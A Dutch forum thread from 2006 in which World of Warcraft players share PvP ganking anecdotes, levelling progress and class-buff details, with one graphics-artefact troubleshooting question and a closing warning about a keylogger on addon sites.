Hahaha gister toch weer een actie in STV. Ik liep met mijn vaste PVE maatje (lvl 38 warrior) door STV te questen. Zien we opeens een Allie in nood. Wij overleggen via TS en besloten om hem maar even te helpen. (Hij werd als lvl 38 aangevallen door 5 level 39 mobs). Wij beginnen die mobs te slopen, rent die eikel weg om zich te gaan healen. Dus we voelen het al aankomen, en ja hoor....hij valt de warrior aan. Ik gelijk vol op die Alliance sukkel, maar hij kon nog net de warrior slopen. Ik legde hem neer waarna ik zelf door de mobs gepakt werd.

Toen zijn we hem wél gaan ganken. Toen we terugkwamen bij onze corpses was hij alweer in gevecht. Wij bandagen en mana slurpen en vol op hem! Hij probeerde nog weg te rennen maar was uiteraard kansloos. (Human Pala) Hierna nog één keer geganked waarna hij niet al te hard meer terugkwam. Wij zaten op hem te wachten tot een Dwarf hunter kwam aangrinden. Hij zag mij niet dus viel de warrior aan die AFK leek te zijn. *blink* *frostbolt* *frostbolt* *dood*. Op dat moment spawned de Human Pala en rent hard weg....ik er nog achteraan maar kreeg hem net niet te pakken. Nog geen minuut later hadden we 3 x 60's op ons dak inclusief dat mieterige palatje. Die is dus op het pad gaan huilen bij zijn mede alliance vriendjes dat wij triest bezig waren, terwijl hij ons pakt nadat we hem helpen.

Tijd voor de mooie roze tier-set voor deze pala...

Ik twijfel op dit moment nog even over mijn live and let live statement van gister......
Wel level 39,5 gister...dus dat word mounten vanavond :9

[ Voor 4% gewijzigd door Ebayzo op 21-12-2006 10:22 ]

Default blanke hetero

Verwijderd

Ik ging gister in felwood grinden met Nef-head-buff, songflower en mongoose pot. 1520 ap en 40% crit. Wordt ik geganked door een warrior... tuurlijk, net dan.
Enfin, ik ben een hunter dus ik vind die eikel wel. Vind hem in midden felwood (ik was aan het grinden in Noord een schiet 50% van zijn hp af, maar hij rent weg op zijn mount, kk sissy, prima, hij was duidelijk whippers aan het zoeken dus np). Ik ga naar de meest zuidelijke whipper-plaats en schiet hem daar te barsten terwijl ie in paniek wegrent (lol noob, chargen, niet wegrennen van een hunter...). Uiteraard alles wat rood was geganked tijdens deze, hunt-em-daun-10-minuten. Toen maar weer premade gaan pvp-en met guildies in BG's =)

• thewizard2006
ntldr.dll is van windows, dus daar moet je vanaf blijven. Grote kans als je dit weghaalt dat je pc niet meer opstart

ennuh gister ook meerdere malen gehad. Zie een horde in nood (zelf alliantie) dus ik ga hem helpen hij loopt weg, ik bijna dood maar mob ook, gaatie mij aanvallen --> hoe triest: heb echt het idee dat dit van die 13 jarige jongetjes zijn :S
ook btw fatsoenlijke tegengekomen, waarbij we welkaar hielpen en om de beurten als eerste aanvielen en dan ff applaud etc.
ook jammer dat ik een of andere buff had van 10% movement speed + all abillities +15%, komt er zown randdebiel l60 die me ff oneshot killed, heel triest, had ook nog een 32stamina buff en die buff van de hunters dat je zoveel armour krijgt en all je abillites met 6 ofzow omhoog gaan. Alles dus in 1x weg door zown trieste gast.
Eigenlijk moeten ze hier gewoon levelcappen...

Verwijderd

thewizard2006 schreef op donderdag 21 december 2006 @ 10:38:
en die buff van de hunters dat je zoveel armour krijgt en all je abillites met 6 ofzow omhoog gaan.
Is van dr00d.

• remcio
  • Laatst online: 24-08 13:48
daarom kun je sommige druids ook bijna geen pijn doen in bear form sommige hebben meer armor dan tanks

[ Voor 27% gewijzigd door remcio op 21-12-2006 10:44 ]

• Snuffel
  • Laatst online: 11:40

Snuffel

Vroem!

Uitdaging!

Ik heb al tijden last van een vreemb probleem in WoW, en dat doet zich ook alleen voor in WoW.
Even wat specs: P4 2.6GHz met een 6800GT 256Mb grafische kaart, laatste drivers.
Wat gebeurt er tijdens het spelen? Welnu, op sommige stukken (Ungoro Crater bijv) heb ik last van 'artefacts'. Het scherm wordt opgedeeld in blokken en die flickeren. Met name in gele/groene gebieden heb ik daar last van, en op het moment dat ik na een tijdje idle ben geweest terug schiet naar het login scherm.

Ik heb al diverse malen test programma's gedraaid, maar krijg nooit foutmeldingen daaruit terug.
Nu heb ik het vermoeden dat het aan de drivers ligt, dus mijn vragen:
Welke moet ik gebruiken? Wie heeft/herkent dit probleem en heeft de oplossing?

You have to be careful if you don't know where you are going because you might not get there...

• Ebayzo
  • Registratie: Juli 2001
  • Laatst online: 17-10-2022

Ebayzo

hij/hem

thewizard2006 schreef op donderdag 21 december 2006 @ 10:38:heb echt het idee dat dit van die 13 jarige jongetjes zijn :S
ook btw fatsoenlijke tegengekomen, waarbij we welkaar hielpen en om de beurten als eerste aanvielen en dan ff applaud etc.
Iedergeval geen speler die het al langer spelen. Maar ja, het is gewoon het meest lompe wat je kan doen :) Ok, dat een level 60 me ganked midden op de weg daar kan ik nog wel overheenkomen. Corpscampen vervolgens dan weer niet... Maar als we zo'n gozer helpen dan is het wel triest om weg te gaan en vervolgens ons aan te vallen.

Default blanke hetero

• Exitium
Verwijderd schreef op donderdag 21 december 2006 @ 10:07:
[...]

hehehe, dan weet ie waarmee hij fucked >:)

Ik neem aan dat je "gewoon de 19e dag" bedoelt en niet 19 days played :P , dan vind ik het wel netjes. Maarja, dat zeg ik met 16 dagen played @ lvl 49 :X , maargoed, dat komt mede door het verkennen en rondlopen voor de lol, low lvl guildies helpen en pvpen. Maar ook ik wil dit jaar 60 worden zodat het netjes aansluit met TBC. Gelukkig is de zaak volgende week dicht dus dat word diehard wowen op cola/wiet >:) . Als ik je wat kan aanraden aangezien je ong hetzelfde lvl ben als mij. Blasted Lands is erg leuk, lekker pittig ook :)
19e dag inderdaad sinds ik begon te levelen vanaf 19, sta nu op 6.5 dagen played. (heb op lvl 18/19 nog wat WSG's enzo gedaan dus wat tijd verloren daar) Heb gisteravond 50 gedinged in Blasted Lands met die buff quests, ga vanavond ofwel naar Maraudon/ST, ofwel naar Searing Gorge waar ik nog niet geweest ben. Liep daar op m'n pala al rond lvl 46 rond, maar heb nu questarea's gedaan waar ik op m'n main niet veel geweest ben. (Feralas, Hinterlands) Valt genoeg te doen zo rond begin 50 voor me. SG, Felwood, WPL, Azshara, Blasted Lands, etc.

• Kevinp
Snuffel schreef op donderdag 21 december 2006 @ 10:44:
Uitdaging!

Ik heb al tijden last van een vreemb probleem in WoW, en dat doet zich ook alleen voor in WoW.
Even wat specs: P4 2.6GHz met een 6800GT 256Mb grafische kaart, laatste drivers.
Wat gebeurt er tijdens het spelen? Welnu, op sommige stukken (Ungoro Crater bijv) heb ik last van 'artefacts'. Het scherm wordt opgedeeld in blokken en die flickeren. Met name in gele/groene gebieden heb ik daar last van, en op het moment dat ik na een tijdje idle ben geweest terug schiet naar het login scherm.

Ik heb al diverse malen test programma's gedraaid, maar krijg nooit foutmeldingen daaruit terug.
Nu heb ik het vermoeden dat het aan de drivers ligt, dus mijn vragen:
Welke moet ik gebruiken? Wie heeft/herkent dit probleem en heeft de oplossing?
Met ati kaart in het begin hetzelfde probleemg gehad, crashes in searing george, en artifacts, dit is idd door een driver opgelost. Qua nvidia drivers weet ik niet welke het beste zijn normaal gesproken zou ik zeggen gewoon de nieuwste

Pagina: 1 ... 7 ... 10 Laatste

Dit topic is gesloten.

Let op:
Geen slow-chat!
Geen one-liners!
Geen onzinnig offtopic geblaat!

Let op! Er is een keylogger in omloop op populaire addon sites.